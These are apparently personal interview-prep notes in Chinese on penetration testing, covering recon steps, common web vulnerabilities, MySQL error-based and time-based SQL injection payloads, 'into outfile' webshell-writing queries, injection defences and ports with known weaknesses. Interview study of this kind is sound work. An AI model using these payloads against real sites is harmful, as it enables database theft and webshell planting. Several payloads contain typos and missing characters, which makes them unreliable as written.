看面試題請看原文,下面是自己記的筆記
https://mp.weixin.qq.com/s/ohMD2pfTMnkRpCX3X76M6A
https://mp.weixin.qq.com/s/FDCo_eDHTbdc9R7GG8p5Rg
https://mp.weixin.qq.com/s/BQfNoodElOgDGFoUfiqlPQ
Sql注入方法總結(各種數據庫)
https://mp.weixin.qq.com/s/2pp5s-_39lR_V6LHQUjMtg
端口總結
https://www.secpulse.com/archives/117822.html
-----------------------------------------------------
1.滲透全流程
信息收集,漏洞利用,權限提升,權限維持,清除痕跡
2.信息收集
網站目錄掃描(敏感文件),網站語言,中間件,cms,子域名,cdn,真實ip
Waf,系統類型,端口掃描,whois信息(姓名,郵箱,備案信息,電話),通用漏洞,github源碼,弱口令等
3.常見web漏洞
Xss,SQL注入,文件上傳,命令執行,csrf,ssrf,未授權訪問,越權,文件包含,爆破,敏感信息泄漏,目錄遍歷,
4.判斷出網站的cms有什么意義
查找網上已曝光的程序漏洞。
如果開源,還能下載相對應的源碼進行代碼審計。
5.一個成熟且相對安全的cms,掃描目錄的意義
敏感文件、二級目錄掃描
站長的誤操作比如:網站備份的壓縮文件、說明.txt、二級目錄可能存放着其他站點
6.常見web容器
IIS,Apache,Tomcat,Nginx
7.mysql注入寫一句話,需要什么權限
Root權限,絕對路徑,GPC關閉(能使用單引號,magic_quotes_gpc=On),沒有配置–secure-file-priv
8.為什么一個mysql的站,只有80端口開放
改了端口,沒掃出來,站庫分離,3306不對外開放
9.windows下mysql兩種提取方式
Udf提取,serv-u提取
10.sql注入類型
注入點類型:數字型,字符型,搜索型
數據提交方式:GET型,POST型,HTTP頭注入,cookie注入
執行效果:布爾盲注,延時注入,報錯注入,union聯合查詢注入,堆疊注入,寬字節注入
11.報錯注入的函數有哪些
1)and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】
2)通過floor報錯 向下取整
3)+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
4).geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
5).multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
6).polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
7).multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
8).linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
9).multilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
10).exp()select from test where id=1 and exp(~(select * from(select user())a));
12.延時注入如何判斷
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
13.盲注和延時注入共同的特點
只能一個字符一個字符的判斷
14.sql注入寫一句話函數
select '一句話' into outfile '路徑'
select '一句話' into dumpfile '路徑'
15.sql注入防護方式
前端過濾SQL注入相關字符
使用安全的api
對特殊字符進行轉義
使用預編譯
16.SQL注入http頭注入點
useragent
referer
cookie
ip
16.滲透測試中常見的端口
數據庫類:
1433 mssql
1521 oracle
3306 mysql
5432 postgresql
特殊服務類
443 ssl心臟滴血
873 Rsync未授權
5984 CouchDB http://ip:5984/_utils/
6379 redis未授權
7001,7002 weblogic弱口令,反序列化
常用端口
21 ftp
22 ssh
23 telnet
3389 遠程桌面